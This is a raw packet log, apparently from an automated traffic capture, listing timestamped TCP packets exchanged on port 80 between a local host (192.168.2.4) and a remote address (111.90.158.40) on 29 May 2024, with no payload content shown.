May 29, 2024 14:25:27.034813881 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034928083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034940958 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034957886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034966946 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.034970999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034984112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.034995079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035006046 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035017967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035021067 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035029888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035042048 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035052061 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035056114 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035069942 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035073996 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035094023 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035106897 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035156965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035167933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035188913 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035231113 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035293102 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035304070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035315990 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035325050 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035326004 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035341024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035350084 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035372972 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035384893 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035391092 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035417080 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035435915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035446882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035456896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035468102 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035480022 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035480976 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035491943 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035501003 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035505056 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035516024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035527945 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035528898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035542011 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035545111 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035581112 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035614014 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035630941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035640955 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035651922 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035659075 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035664082 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035676003 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035684109 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035687923 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035698891 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035708904 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035712957 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035722017 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035732031 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035743952 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035751104 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035754919 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035768032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035773039 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035779953 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035792112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035805941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035816908 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035819054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035831928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.035841942 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035859108 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.035967112 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036031008 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036062956 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036101103 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036115885 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036125898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036138058 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036156893 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036163092 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036175966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036186934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036200047 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036201000 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036218882 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036251068 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036262035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036273003 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036288023 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036290884 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036304951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036307096 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036349058 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036379099 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036422014 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036433935 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036452055 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036472082 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036493063 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036515951 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036564112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036596060 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036597013 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036607981 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036619902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036631107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036640882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036643982 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036653996 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036664963 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036669016 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036678076 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036709070 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036720037 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036750078 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036771059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036797047 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036803007 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036808968 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036819935 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036834002 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036859989 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036864042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036876917 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036889076 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036899090 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036921024 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036925077 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036936998 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036958933 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.036967993 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036979914 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.036993980 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037003994 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037008047 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037019968 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037029982 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037034035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037048101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037055969 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037060022 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037071943 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037084103 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037085056 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037096024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037106991 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037107944 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037120104 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037123919 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037133932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037158012 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037374020 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037377119 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037420034 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037430048 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037441969 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037473917 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037522078 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037548065 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037566900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037579060 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037587881 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037596941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037617922 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037621021 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037636042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037648916 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037661076 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037661076 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037673950 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.037682056 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037705898 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.037863016 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.038892984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.038927078 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.038938999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.038974047 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039031029 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039050102 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039062023 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039071083 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039077997 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039091110 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039103031 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039113998 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039150000 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039413929 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039454937 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039504051 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039525032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039550066 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039556026 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039561033 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039572954 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039583921 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039594889 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039597034 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039619923 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039678097 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039690018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039722919 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039727926 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039736032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039756060 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039763927 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039776087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039794922 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039798975 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039813995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039824963 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039829969 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039844990 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039856911 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039861917 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039872885 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039896011 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039907932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039917946 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039927959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039938927 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039943933 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039952040 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039962053 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.039963961 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039977074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.039992094 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.040007114 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040019989 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040028095 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.040046930 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040055037 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.040065050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040075064 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040096998 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.040102005 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040112972 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040122986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040133953 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040138960 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.040147066 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040158033 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.040158987 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040170908 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040182114 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040184021 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.040194035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040200949 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.040205956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040218115 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040227890 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.040252924 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.040282965 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.043909073 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.043942928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.043952942 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.043970108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.043982983 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.043996096 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044001102 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044030905 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044070005 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044080973 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044091940 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044102907 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044111013 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044115067 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044126987 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044137955 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044159889 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044209957 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044222116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044231892 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044241905 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044249058 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044255018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044266939 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044274092 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044281006 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044291019 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044301987 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044312000 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044337988 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044341087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044358969 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044370890 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044373035 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044384003 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044395924 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044408083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044410944 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044419050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044425964 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044430971 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044455051 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044521093 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044538975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044550896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044562101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044564009 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044574022 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044580936 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044591904 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044605017 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044611931 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044615984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044626951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044637918 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044647932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044653893 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044660091 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044671059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044682980 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044687986 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044696093 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044703960 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044708967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044720888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044734001 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044749975 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044775009 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044794083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044821024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044832945 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044866085 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044900894 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044903994 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044917107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044928074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044936895 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044953108 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.044962883 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044976950 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.044981956 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045001984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045011997 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045011997 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045027018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045044899 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045068979 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045082092 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045092106 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:27.045100927 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:27.045120955 CEST	80	49760	111.90.158.40	192.168.2.4
